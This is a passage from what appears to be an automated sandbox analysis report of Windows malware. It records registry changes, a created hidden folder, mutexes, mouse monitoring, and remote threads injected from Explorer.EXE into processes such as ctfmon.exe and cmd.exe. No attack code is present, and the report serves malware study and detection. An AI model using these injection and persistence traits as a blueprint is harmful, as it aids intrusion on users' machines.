Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\ ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\\ ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\\ ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ ProxyEnable ], New Value: [ 0 ]
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Common AppData ], New Value: [ C:\Documents and Settings\All Users\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ GlobalUserOffline ], New Value: [ 0 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ AppData ], New Value: [ C:\Documents and Settings\Administrator\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ MigrateProxy ], New Value: [ 1 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ ProxyEnable ], New Value: [ 0 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ],
Value Name: [ SavedLegacySettings ], New Value: [ 0x3c0000001700000001000000000000000000000000000000040000000000 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ ConsoleTracingMask ], Value: [ 4294901760 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ EnableConsoleTracing ], Value: [ 0 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ EnableFileTracing ], Value: [ 0 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ FileDirectory ], Value: [ %windir%\tracing ], 2 times
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ FileTracingMask ], Value: [ 4294901760 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ MaxFileSize ], Value: [ 1048576 ], 1 time
Key: [ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ],
Value Name: [ UrlEncoding ], Value: [ 0x00000000 ], 2 times
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Value Name: [ Next_Catalog_Entry_ID ], Value: [ 1020 ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Value Name: [ Num_Catalog_Entries ], Value: [ 13 ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Value Name: [ Serial_Access_Num ], Value: [ 6 ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000001 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000002 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000003 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000004 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\rsvpsp.d ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000005 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\rsvpsp.d ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000006 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000007 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000008 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000009 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000010 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000011 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000012 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000013 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING ],
Value Name: [ Explorer.EXE ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ ConsoleTracingMask ], Value: [ 4294901760 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ EnableConsoleTracing ], Value: [ 0 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ EnableFileTracing ], Value: [ 0 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ FileDirectory ], Value: [ %windir%\tracing ], 4 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ FileTracingMask ], Value: [ 4294901760 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ MaxFileSize ], Value: [ 1048576 ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ],
Value Name: [ AllUsersProfile ], Value: [ All Users ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ],
Value Name: [ DefaultUserProfile ], Value: [ Default User ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ],
Value Name: [ ProfilesDirectory ], Value: [ %SystemDrive%\Documents and Settings ], 6 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-842925246-1425521274-308236825-500 ],
Value Name: [ ProfileImagePath ], Value: [ %SystemDrive%\Documents and Settings\Administrator ], 3 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
Value Name: [ CommonFilesDir ], Value: [ C:\Program Files\Common Files ], 3 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
Value Name: [ ProgramFilesDir ], Value: [ C:\Program Files ], 3 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Common AppData ], Value: [ %ALLUSERSPROFILE%\Application Data ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 4 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ ComSpec ], Value: [ %SystemRoot%\system32\cmd.exe ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ FP_NO_HOST_CHECK ], Value: [ NO ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ NUMBER_OF_PROCESSORS ], Value: [ 1 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ OS ], Value: [ Windows_NT ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PATHEXT ], Value: [ .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_ARCHITECTURE ], Value: [ x86 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_IDENTIFIER ], Value: [ x86 Family 6 Model 3 Stepping 3, GenuineIntel ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_LEVEL ], Value: [ 6 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_REVISION ], Value: [ 0303 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ Path ], Value: [ %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ TEMP ], Value: [ %SystemRoot%\TEMP ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ TMP ], Value: [ %SystemRoot%\TEMP ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ windir ], Value: [ %SystemRoot% ], 6 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters ],
Value Name: [ WinSock_Registry_Version ], Value: [ 2.0 ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ],
Value Name: [ Num_Catalog_Entries ], Value: [ 3 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ],
Value Name: [ Serial_Access_Num ], Value: [ 4 ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ DisplayString ], Value: [ Tcpip ], 4 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ Enabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\mswsock.dll ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ ProviderId ], Value: [ 0x409d05229e7ecf11ae5a00aa00a7112b ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ SupportedNameSpace ], Value: [ 12 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ Version ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ DisplayString ], Value: [ NTDS ], 4 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ Enabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\winrnr.dll ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ ProviderId ], Value: [ 0xee37263b80e5cf11a55500c04fd8d4ac ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ SupportedNameSpace ], Value: [ 32 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ Version ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ DisplayString ], Value: [ Network Location Awareness (NLA) Namespace ], 4 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ Enabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\mswsock.dll ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ ProviderId ], Value: [ 0x3a244266a83ba64abaa52e0bd71fdd83 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ SupportedNameSpace ], Value: [ 15 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ Version ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 ],
Value Name: [ Serial_Access_Num ], Value: [ 6 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Environment ],
Value Name: [ TEMP ], Value: [ %USERPROFILE%\Local Settings\Temp ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Environment ],
Value Name: [ TMP ], Value: [ %USERPROFILE%\Local Settings\Temp ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ EnableHttp1_1 ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ EnableNegotiate ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ GlobalUserOffline ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ MimeExclusionListForCache ], Value: [ multipart/mixed multipart/x-mixed-replace multipart/x-byteranges ], 4 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ WarnOnPost ], Value: [ 0x01000000 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ],
Value Name: [ EnableHttp1_1 ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ],
Value Name: [ ParseAutoexec ], Value: [ 1 ], 3 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ AppData ], Value: [ %USERPROFILE%\Application Data ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ MigrateProxy ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ ProxyEnable ], Value: [ 0 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ],
Value Name: [ DefaultConnectionSettings ], Value: [ 0x3c0000000300000001000000000000000000000000000000040000000000 ], 4 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ],
Value Name: [ SavedLegacySettings ], Value: [ 0x3c0000001500000001000000000000000000000000000000040000000000 ], 8 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ APPDATA ], Value: [ C:\Documents and Settings\Administrator\Application Data ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ CLIENTNAME ], Value: [ Console ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ HOMEDRIVE ], Value: [ C: ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ HOMEPATH ], Value: [ \Documents and Settings\Administrator ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ HOMESHARE ], Value: [ ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ LOGONSERVER ], Value: [ \\PC ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ SESSIONNAME ], Value: [ Console ], 6 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Monitored Registry Keys:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change,Security Descriptor Change ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Watch subtree: [ 0 ], Notify Filter: [ Key Change ], 1 time
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change,Security Descriptor Change ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ],
Watch subtree: [ 0 ], Notify Filter: [ Key Change ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\\ ],
Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change ], 2 times
[=============================================================================]
5.b) Explorer.EXE - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\Documents and Settings\Administrator\Application Data\A16126B3 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
File Name: [ c:\autoexec.bat ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Directories Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Directory: [ C:\Documents and Settings\Administrator\Application Data\A16126B3 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 29 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\system32\RASAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.dll ]
File Name: [ C:\WINDOWS\system32\rasman.dll ]
File Name: [ C:\WINDOWS\system32\sensapi.dll ]
[=============================================================================]
5.c) Explorer.EXE - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\WINDOWS\system32\ctfmon.exe ]
Affected Process: [ C:\Program Files\Messenger\msmsgs.exe ]
Affected Process: [ C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe ]
Affected Process: [ C:\WINDOWS\system32\wscntfy.exe ]
Affected Process: [ C:\Program Files\Common Files\kxuckd.exe ]
Affected Process: [ C:\Program Files\Common Files\drlwszvxbeo.exe ]
Affected Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe ]
Process: [ C:\Program Files\Common Files\drlwszvxbeo.exe ]
Process: [ C:\Program Files\Common Files\kxuckd.exe ]
Process: [ C:\Program Files\Messenger\msmsgs.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
Process: [ C:\WINDOWS\system32\ctfmon.exe ]
Process: [ C:\WINDOWS\system32\wscntfy.exe ]
[=============================================================================]
5.d) Explorer.EXE - Other Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Mutexes Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Mutex: [ Local\I0000055C ]
Mutex: [ Local\M0000055C ]
Mutex: [ Local\R7CB9D1B4 ]
Mutex: [ Local\S7CB9D1B4 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Keyboard Keys Monitored:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Virtual Key Code: [ VK_LBUTTON (1) ], 46 times
[#############################################################################]
6. ctfmon.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: ctfmon.exe
MD5: 5f1d5f88303d4a4dbc8e5f97ba967cc3
SHA-1: 99cb7370f16773c8e2d0c86fe805ec638ab126e9
File Size: 15360 Bytes
Command Line: "C:\WINDOWS\system32\ctfmon.exe"
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\MSUTB.dll ],
Base Address: [0x5FC10000 ], Size: [0x00033000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
